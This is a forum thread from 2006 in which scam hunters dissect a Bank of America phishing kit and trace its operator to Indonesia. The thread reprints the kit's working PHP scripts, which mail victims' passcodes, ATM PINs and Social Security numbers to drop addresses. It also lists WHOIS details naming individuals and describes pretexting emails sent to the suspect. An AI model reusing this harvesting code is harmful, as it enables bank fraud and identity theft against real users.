how-to block ads
|
MGD
Premium,MVM
join:2002-07-31
Fort Lauderdale, FL
| [Phishing] Bank of America Phish, caught work in progress.
I was checking out a BOA phish posted by huntermcdole  on phishtrack: »/phishtrack?pi···&parts=1 I am looking to see if any wizards out there can review that following data, and dig up any additional info or fingerprints on these criminals.
This is a very professional and slick phish »www.bankofamerica.com.cgi-bin.bo···ller.htm because in addition to the victims account data, it also seems to create or obtain your sitekey data. You can enter bogus info on the first page and then see what the sitekey page is trying to do.
Fortunately while monitoring the phish site I came across the entire upload package from the phisher. They went back and removed the zipped payload within a few hours [Exhibit 1 & 2]. There may be additional unique data that can be found, see attached presentation.zip. Though you obviously cannot see the php scripts on other BOA phishes, I wonder if there are other unique items that could be used to link them to the same author.
Someone more familiar with php scripts can confirm if there are two separate emails going to the phisher. One from "securekey.php" with sitekey/securekey info going to: purisangeh_team@yahoo.com and a back up to rdcpt0809@airpost.com with a from of BoA(support[AT]PlatinumBank.com)
<?
//if($securityKey3Ansr==""||$securityKey2Ans==""||$securityKey1Ans=="")
// {header("Location: GotoErrorsecurityKeyPage.htm");return FALSE; }
session_start();
//USER ACCOUNT
$securityKey1 = $_POST['securityKey1'];
$securityKey1Ans = $_POST['securityKey1Ans'];
$securityKey2 = $_POST['securityKey2'];
$securityKey2Ans = $_POST['securityKey2Ans'];
$securityKey3 = $_POST['securityKey3'];
$securityKey3Ansr = $_POST['securityKey3Ans'];
$ip = $_SERVER["REMOTE_ADDR"];
$subj = "Site Key BoA ip :$ip";
$msg = "Site key From ip :$ip
\n-------------------
\n\nSiteKey Challenge Question1: $securityKey1\nAnswer1: $securityKey1Ans\nSiteKey Challenge Question2: $securityKey2\nAnswer2: $securityKey2Ans\nSiteKey Challenge Question3: $securityKey3\nAnswer3: $securityKey3Ans
";
$from = "From: BoA<support@PlatinumBank.com>";
$to = "purisangeh_team@yahoo.com";
$backup = "rdcpt0809@airpost.com";
mail($to, $subj, $msg, $from, $chk);
mail($backup, $subj, $msg, $from, $chk);
header("Location: GotoCompletePage.htm");
?>
Another file "update.php" appears to be mailing the online id passcode and atm info to the same addresses:
<?
if($D1==""||$online_id==""||$passcode==""||$email=="")
{ if(! ereg ("^.+@.+\\..+$", $email))
{header("Location: GotoErrorAccountPage.htm");return FALSE; }}
if($ssn3=="")
{ header("Location: GotoErrorSecurityPage.htm");return FALSE; }
if(isset($atm_number) || isset($pin))
{ if(!ereg("^[0-9]+$",$atm_number) || !ereg("^[0-9]+$",$pin))
{ header("Location: GotoErrorVerifyPage.htm"); return FALSE;} }
session_start();
//USER ACCOUNT
$D1 = $_POST['D1'];
$online_id = $_POST['online_id'];
$passcode = $_POST['passcode'];
$repasscode = $_POST['repasscode'];
$email = $_POST['email'];
$atm_number = $_POST['atm_number'];
$pin = $_POST['pin'];
//SECURITY QUESTION
$ssn1 = $_POST['ssn1'];$ssn2 = $_POST['ssn2'];$ssn3 = $_POST['ssn3'];
$ip = $_SERVER["REMOTE_ADDR"];
$subj = "Full Info BoA ip :$ip";
$msg = "Full Info From ip :$ip
\nUSER ACCOUNT
\n-------------------
\n\nAccount open in : $D1\nOnline ID : $online_id\nPasscode : $passcode\nLast 8 Digit ATM : $atm_number\nATM PIN : $pin\nEmail : $email
\n\nSECURITY QUESTION
\n---------------------
\n\nS S N : $ssn1-$ssn2-$ssn3";
$from = "From: BoA<support@PlatinumBank.com>";
$to = "purisangeh_team@yahoo.com";
$backup = "rdcpt0809@airpost.net";
mail($to, $subj, $msg, $from, $chk);
mail($backup, $subj, $msg, $from, $chk);
header("Location: GotoCompletePage.htm");
?>
Unfortunately without figuring out the password to the Yahoo email account there is no way to locate victims. I have never been able to have Yahoo pull an account based on submitting a script snippet showing that it is being used as a data collection tool. I guess it is possible to interfere and load them with bogus data by looking at the way the script formats the mail.
While the yahoo address is currently valid, it is difficult to check the backup one. Airpost.net appears to be a Canadian company that maybe forwards email, though it appears that there is no current DNS records so I am not sure if it is active.
The use of purisangeh_team indicates a group operation. Purisangeh may be Indonesian as indicated by a google search: »www.google.com/search?hl=en&q=Pu···e+Search I went to the Kaskus site listed at the top of the search looking for posts by the user Purisangeh, however the forum search function is disabled. It was worth checking because the search shows that it is not a common word. (WARNING: while looking at the google cache of KASKUS yesterday I got a popup with an attempt to install the wmf exploit, it only happened once, I have been back several times without incident, but be careful if you go there.)
Due to Google showing that "purisangeh" was rather unique, I decided to check out the purisangeh.org that was included in the search return. It is not an active domain, the A record points to Yahoo but looks like it may be pulled. Checking on the registration shows that it was registered in October of 2004 for 5 years to an individual in Cummings, GA. using an email address of purisangeh8181@yahoo.com. Someone in Georgia registering a name like that for 5 years did not seem cool, so I called the registered telephone number which turned out to be not them. I located a correct number for that name and spoke to the individual. As suspected they did not register the Purisangeh.org domain. However in October of 04 at the same time as the registration their credit card had been hit for hundreds of dollars in fraudulent charges. Their Bank notified them that the multiple charges were for all kinds of "Internet services". I am convinced that these are the same criminals.
I am not sure what is going on where the phish is hosted at cfusa.net. Doesn't the phisher need control of the domain in order to do this?: »www.bankofamerica.com.cgi-bin.bo···fusa.net which resolves the same as »www.cfusa.net. Notice how the phisher has his own "suspended page" available at »www.bankofamerica.com.cgi-bin.bo···ed.page/ I have seen that exact page format on other phishes. I guess you can fake the account as being closed when the heat is on, slick!!.
As recent as December 21st the google cache of the site showed this:»64.233.187.104/search?q=cache:vI···/+&hl=en Seems a little strange !!. The domain has been around for a few years see archive: »web.archive.org/web/*/http://www.cfusa.net
MGD
P.S. Since preparing this post the phish page now appears to be down, it was down and modified a few times during the research but came back. The directories are all still there. | |
removed
I'm the bobblehead
Premium,VIP
join:2002-02-08
Houston, TX
clubs: | Re: [Phishing] Bank of America Phish, caught work
To elaborate on the "suspended.page" directory: it's a standard cPanel (web hosting control panel) thing, and probably not something that the scammer set up to fool authorities. | |
huntermcdole
Premium
join:2005-08-01
Tucson, AZ
 ·Cox HSI
 ·ViaTalk
 ·Qwest.net
edit:
January 6th, @04:59PM
| reply to MGD
Good to know that they are going down. I have a catch all account at my domain so I get a lot of spam and some of them are phishing attemps. That was the first one I have seen where the link almost lookd like the real site, most I see are 124.15.154.21 type | |
MGD
Premium,MVM
join:2002-07-31
Fort Lauderdale, FL
| reply to removed
said by removed :To elaborate on the "suspended.page" directory: it's a standard cPanel (web hosting control panel) thing,..... Ahh, that explains why I have ran across it multiple times. Can we then assume it a total hack job because the file is dated the same as the phish folders?. He must also have control over the domain dns, in order to have created the sub domain prefix.
MGD | |
MGD
Premium,MVM
join:2002-07-31
Fort Lauderdale, FL
edit:
February 3rd, @11:39AM
| Interesting follow up:
Though the digging through phishes looking for and extracting the email drop boxes is both tedious and time consuming, what irks me the most is the failure of the majors to yank the accounts despite frequent larts. If these drop box accounts were pulled promptly, it would prevent the phised data from being recovered. Now that most of the email providers have forsaken the abuse@ and gone to online forms for complaints (Gmail,Yahoo etc.), they have no easy method for reporting them. Getting clueless replies requesting the email headers from the "offending account", despite including snippets from the code clearly indentifying the email address as part of a scam, is frustrating. By the time the issue is escalated to a clued rep, the data is long gone.
With that in mind, I sometimes go back a few weeks afterwards, and recheck the dpop accounts to see if they were cancelled. In addition to using the Rcp to @ the mx server, I also send an email to the address to see if it bounces. I usually include some benign reference to the Phish to see if I can elicit a response, and every now and then I get one.
Two days ago I tested the purisangeh_team@yahoo.com drop box on this BOA phish, now over a month old. I always want to include some trigger in the subject line to try and get attention. In this case I listed the subject as "KASKUS" which is a Indonesian chat forum that was one of the few places where the name Purisangeh had turned up as a poster: »www.kaskus.com/member.php?u=69571 Indonesia became a focus since a previous identical BOA phish which was reported in NANAS on 12/05, was also emailed via the exact same open proxy as this one: »groups.google.com/group/news.adm···e0261745 Coincidentally that phish site was hosted on a hijacked box in Indonesia.
So I sent off the following email to the phish drop box:
From: Macs Retsub
To: purisangeh_team@yahoo.com
Date: Feb 1, 2006 5:53 PM
Subject: Kaskus
Hey, I still have the files from the Bank of America phish.
The address rdcpt0809@airpost.com is dead.
Which other one can I use??
I have the logs too.
I try to make them fuzzy, but throw in a few clues, and hope they respond with their guard down. Well about 24 hours later in pops this:
From: ariando huge
To: Macs Retsub
Date: Feb 2, 2006 4:06 AM
Subject: Re: Kaskus
What are you talking about???
Ahh, got a hit !! so I responded with some more info, and included a snippet of the BOA phish processing script showing the data collection address.
From: Macs Retsub
To: ariando huge
Date: Feb 2, 2006 12:16 PM
Subject: Re: Kaskus
The data from the credit card and BOA scam:
Some of the logs were sent to me by mistake??
if(isset($atm_number) || isset($pin))
{ if(!ereg("^[0-9]+$",$atm_number) || !ereg("^[0-9]+$",$pin))
{ header("Location: GotoErrorVerifyPage.htm"); return FALSE;} }
session_start();
//USER ACCOUNT
$D1 = $_POST['D1'];
$online_id = $_POST['online_id'];
$passcode = $_POST['passcode'];
$repasscode = $_POST['repasscode'];
$email = $_POST['email'];
$atm_number = $_POST['atm_number'];
$pin = $_POST['pin'];
//SECURITY QUESTION
$ssn1 = $_POST['ssn1'];$ssn2 = $_POST['ssn2'];$ssn3 = $_POST['ssn3'];
$ip = $_SERVER["REMOTE_ADDR"];
$subj = "Full Info BoA ip :$ip";
$msg = "Full Info From ip :$ip
\nUSER ACCOUNT
\n-------------------
\n\nAccount open in : $D1\nOnline ID : $online_id\nPasscode : $passcode\nLast 8 Digit ATM : $atm_number\nATM PIN : $pin\nEmail : $email
\n\nSECURITY QUESTION
\n---------------------
\n\nS S N : $ssn1-$ssn2-$ssn3";
$from = "From: BoA<support@PlatinumBank.com>";
$to = " purisangeh_team@yahoo.com";
I thought that it may break the ice!! or loose him. However, he responded:
From: ariando huge
To: Macs Retsub
Date: Feb 2, 2006 1:28 PM
Subject: Re: Kaskus
By the way who are you and what is your business. I just signed up this email for 2 weeks ago. Maybe you made a mistake of contact to person that you mentioned. Please let me know what can I do for you??
Regard,
Huge
Well! that's a big lie, as I posted above I checked the address at the time of posting the dig and it was valid and I also checked it several times afterwards. Yahoo could not have recylcled it in a 48 hour period. Besides, is there a waiting list for Purasengh_Team at Yahoo. In addition the script files that contained the addy were dated ~12/25. So I responded:
From: Macs Retsub
To: ariando huge
Date: Feb 2, 2006 2:05 PM
Subject: Re: Kaskus
You need to check again, this account was active on or before January 1, 2006, who is in the "Team" ??
Within twenty minutes I get this back:
From: ariando huge
To: Macs Retsub
Date: Feb 2, 2006 2:24 PM
Subject: Re: Kaskus
How you can chek it? and who are you? why you investigate me like police? i am musician in New Zealand. Purisangeh is my Group Band Name. What you want ask from me again??
Now I am thinking, is this guy an intern for the Purisangeh Team or what?, I had my red push pin stuck in Jakarta on my world map. Now he says that he is in New Zealand. Well he lied about the two week old email address, so I checked on his honesty by having a look at the mail headers.
X-Gmail-Received: b633b5e5f8108d9d26a619a897e71f68e0d6477a
Delivered-To: *******@gmail.com
Received: by 10.48.248.4 with SMTP id v4cs6897nfh;
Thu, 2 Feb 2006 01:06:55 -0800 (PST)
Received: by 10.54.128.14 with SMTP id a14mr2115170wrd;
Thu, 02 Feb 2006 01:06:55 -0800 (PST)
Return-Path:
Received: from web32002.mail.mud.yahoo.com (web32002.mail.mud.yahoo.com [68.142.207.99])
by mx.gmail.com with SMTP id 11si5302468wrl.2006.02.02.01.06.54;
Thu, 02 Feb 2006 01:06:55 -0800 (PST)
Received-SPF: pass (gmail.com: domain of purisangeh_team@yahoo.com designates 68.142.207.99 as permitted sender)
DomainKey-Status: good (test mode)
Received: (qmail 29227 invoked by uid 60001); 2 Feb 2006 09:06:47 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
s=s1024; d=yahoo.com;
h=Message-ID:Received:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding;
Message-ID:
Received: from [222.124.19.29] by web32002.mail.mud.yahoo.com via HTTP; Thu, 02 Feb 2006 01:06:46 PST
Date: Thu, 2 Feb 2006 01:06:46 -0800 (PST)
From: ariando huge
Subject: Re: Kaskus
To: Macs Retsub
I then did a lookup of IP 222.124.19.29
Location: Indonesia (high) [City: Jakarta, Jakarta Raya (Djakarta Raya)]
inetnum: 222.124.19.16 - 222.124.19.31
netname: TLKM_D3_AST_DUYA_MEDIA
country: ID
descr: PT. DUYA MEDIA
descr: Public Internet Cafe
descr: Jl. Buah Batu No. 165D
descr: Bandung
admin-c: KI32-AP
tech-c: KI32-AP
remarks: ------------------------------------------------------------------
remarks: Send ABUSE and SPAM reports with plain ASCII text only to
remarks: **********@yahoo.com cc to *****@telkom.net.id
remarks: The netname enclosed in square bracket is included in the subject.
remarks: ------------------------------------------------------------------
status: ASSIGNED NON-PORTABLE
changed: ****@telkom.co.id 20050725
mnt-by: MAINT-TELKOMNET
source: APNIC
person: KHAIRIL IMAMI
nic-hdl: KI32-AP
e-mail: **********@yahoo.com
address: Jl. Buah Batu No. 165D
address: BANDUNG
phone: +62227319398
country: ID
changed: ****@telkom.co.id 20050718
mnt-by: MAINT-TELKOMNET
source: APNIC
Ha ha, "huge ariando" you are right where I thought you were, and in an internet cafe no less in downtown Bandung, which is the capital city of West Java Province, about 100 miles southeast of Jakarta. Not exactly New Zealand, so I wrote:
From: Macs Retsub
To: ariando huge
Date: Feb 2, 2006 2:53 PM
Subject: Re: Kaskus
Then why are you now at an Internet Cafe in Bandung?? are you on holidays?
What kind of music do you play? what does Purisangeh mean?
I didn't want to blow him away, I wanted to keep him going, so I included an out!
Then I got this:
From: ariando huge
To: Macs Retsub
Date: Feb 2, 2006 3:39 PM
Subject: Re: Kaskus
I still do not understand with you. I am Jazz Musician. We are in concernt here since 28 january. Listen to me, now i really feel annoyed because of you. I dont know you and you not tell me who you are? So stop email me anonymous person.
BYE.
Ouch!!, yes I am sort of anonymous, my email is not traceable. I don't want to loose him just yet, so I take a five minute refresher course in geography. There are several universities in Bandung, I suspect he may be a student. I try to get him back by alluding to be right there, amd throw some local names in.
From: Macs Retsub
To: ariando huge
Date: Feb 2, 2006 4:26 PM
Subject: Re: Kaskus
Please, do not be annoyed, I like Jazz music too, more progressive though, I am a big fan of DISCUS. Where are you playing at ? the Savoy? maybe I can attend a concert, I checked the papers and I don't see any adverts. Maybe you can come back from New Zealand and play at one of the festivals at Bale Ayer in Taman Ria Senayan in Jakarta, have you ever been there? Try and visit Saung Mang Udjo while you are here. How many are in your band? What instrument do you play?
Wow!! it took all of 4 minutes to get a reply. Boy he sure spends a lot of time on the web in a internet cafe for a on tour "in concert jazz musician"
From: ariando huge
To: Macs Retsub
Date: Feb 2, 2006 4:30 PM
Subject: Re: Kaskus
are you indonesian?? " Apa Kabar? " Why you know all about indonesian place? can you chate with me on yahoo messager? My ID is homebeautypink. I am online now.
Regard,
Huge
Well that sure brought him right back, and he is a homeboy, look at that, form a New Zealander to " Apa kabar" all in a few messages. Well I looked it up:
The phrase "apa kabar" literally means "what (your) news". ... To answer "apa kabar", we usually use "baik" or "baik-baik" to indicate that it's good
I never replied to the "invitation" as I would have to use a nearby proxy, plus I am now stuck language wise. I decided to preserve my options, and sleep on it.
I really just want to get an answer to " What the F**k did you do with all the credit card data that came streaming into that account, and what other scams are now ongoing.
MGD
Edit=typo+formatting | |
Ummmyea
@208.17.x.x | How is your email not traceable? | |
pleekmo
Triptoe Through The Tulips
Premium
join:2001-09-14
Manchester, CT
clubs:
·AT&T DSL Service
| said by Ummmyea :
How is your email not traceable?
Anonymous re-mailer, perhaps.
--
HCN: Because you deserve a rest!
I wonder what Spock would have to say (or do) about Omelas? | |
tapeloop
Light, sweet triceratops.
Premium
join:2004-06-27
Airstrip One
|  reply to MGD
MGD, more power to you my brother. I wish I knew Bahasa so I could help you slam dunk this guy. Keep up the good work and keep us posted.
--
Copyright infringement is illegal. Murder is illegal. Therefore, file sharing is murder. | |
daniyel
join:2001-05-10
Tucson, AZ
| reply to MGD
Good work - that's the way it's done. I had an instance(few of them) where we had AOL employee site posted on our web servers in the middle of the night. By AM, there was already enough hits generated(by emailing internal emp notice/chass pass/update account) to be quite scary, for AOL. I found the creator of the account, ICQ account member the info was being sent after decrypting a cheesy html algorithm. Hosting company didn't want to do anything except turn the accounts off - and refund charges to stolen CC's. After the 6th-7th account, and getting them turned off rapidly, phishers went away and bothered some other host. | |
waldoooo
join:2001-12-15
Fountain Valley, CA
| reply to MGD
I like following the threads of MGD & crew as they help "would be" victims and shut down the thiefs. I don't know how Yahoo or the other companies work but it would seem to me that with a few emails to some of the "higher ups" in the companies showing the amount of people helped and scams broken up by MGD and the group here you guys should be able to get either a phone # or at least a direct email address to a support person who could take action and shut down the fradulent accounts. | |
purisangeh
join:2006-02-03
Island, KY
| reply to MGD
Re: [Phishing] Bank of America Phish, caught work in progress.
Thank you Macs Retsub for your Big mouth to all pigs here. You want be a hero here? I advice you that wash your feet and take a nap your mommy waiting you.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Thu, 2 Feb 2006 16:26:47 -0500
From: "Macs Retsub" Add to Address Book Add Mobile Alert
Yahoo! DomainKeys has confirmed that this message was sent by gmail.com. Learn more
To: "ariando huge"
Subject: Re: Kaskus
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
around hundreds peoples around you doing spam. Why you not againts them near you ?? I have been seen your people, on my cyber cafe. You do not have enough proof to catch me. I hope I can see you as soon as possible, to disccuss our future. I can create all software using Delphi, Php, Asp, Visual Basic, C++. I am not studying in any university yet and i just graduated my senior high school. I am hacker? not true I just new baby born in the earth. Please advice me to be nice people.
I hope God Bless you all.
Our Father Who art in Heaven, hallowd be thy name, thy kingdom come .....
I hope you can remember this pray. I am muslim? I am not sure. American is big politic and economy terorist. We are asian lovin' peace.
Love and Peace
Purisangeh (.)(.) -- lick it. | |
removed
I'm the bobblehead
Premium,VIP
join:2002-02-08
Houston, TX
clubs: | Re: [Phishing] Bank of America Phish, caught work
You must not be that good if ol' MGD found you.  | |
MGD
Premium,MVM
join:2002-07-31
Fort Lauderdale, FL
edit:
February 3rd, @08:32PM
| reply to Anon
Re: [Phishing] Bank of America Phish, caught work
I guess someone must have sent you a "HEADS UP"
said by purisangeh :Thank you Macs Retsub for your Big mouth ...... You want be a hero here? Hey that's only a small price that you pay for being a thief and a criminal. Nope, I am not a hero, I just volunteer my time and forensic cyber skills to try and prevent victims from being defrauded.
You are now a member, read my scam hunting posts. I am an "equal opportunity" scam hunter. I follow the trail wherever it leads. Scammers are everywhere, they come in all shapes, sizes, and religions.
....You do not have enough proof to catch me....
Don't bet on it junior!!! Maybe you will read an article about this in your local paper Pikiran Rakyat
. I am sure that the people of Bandung do not like thieves any more than we do.
I hope I can see you as soon as possible, to disccuss our future....
Sure, just so long as your future includes paying a price for your crimes. I have found your fingerprints on many other phishes, so you have been doing this for a while.
I can create all software using Delphi, Php, Asp, Visual Basic, C++. I am not studying in any university yet..... Great, so why are you using those skills to commit crimes??
instead of doing productive work. Will the universities let you in if they know what you are doing.
Do not be an idiot and bring race and religion into to it. You are a criminal, you got busted !! Face up to it junior..
You spend a lot of time at that Internet Cafe, do you work or live there?? Your emails came from 3 different IP's at the Cafe within a few hours.
MGD
Edit+added link | |
JakartaStinks
@comcast.net | reply to MGD
MGD thats hilarious! Good post, most of those phishers are just wanna-be's trying to make a buck the wrong way. Sooner or later is always catches up, whether its police or someone knocking on thier door ..... that post is hilarious! | |
spanishbob
join:2004-11-30
spain | reply to MGD
Enjoying this one, will follow. Would be nice to see this little $hitbag caught. Does FBI coordinate with local police to catch these guys? Even Kiwis have better spelling than that! | |
catseyenu
Ack Pfft
Premium
join:2001-11-17
Fix East
clubs: | I've got some Indonesian contacts tracking him now.
He'd better not have any "nervous" associates or he's toast. | |
waldoooo
join:2001-12-15
Fountain Valley, CA
edit:
February 4th, @02:08PM
| reply to MGD
quote:
reply to Anon
Re: [Phishing] Bank of America Phish, caught work
I guess someone must have sent you a "HEADS UP"
I doubt anyone tipped him off, google his name again and guess whats on the top of the list | |
|
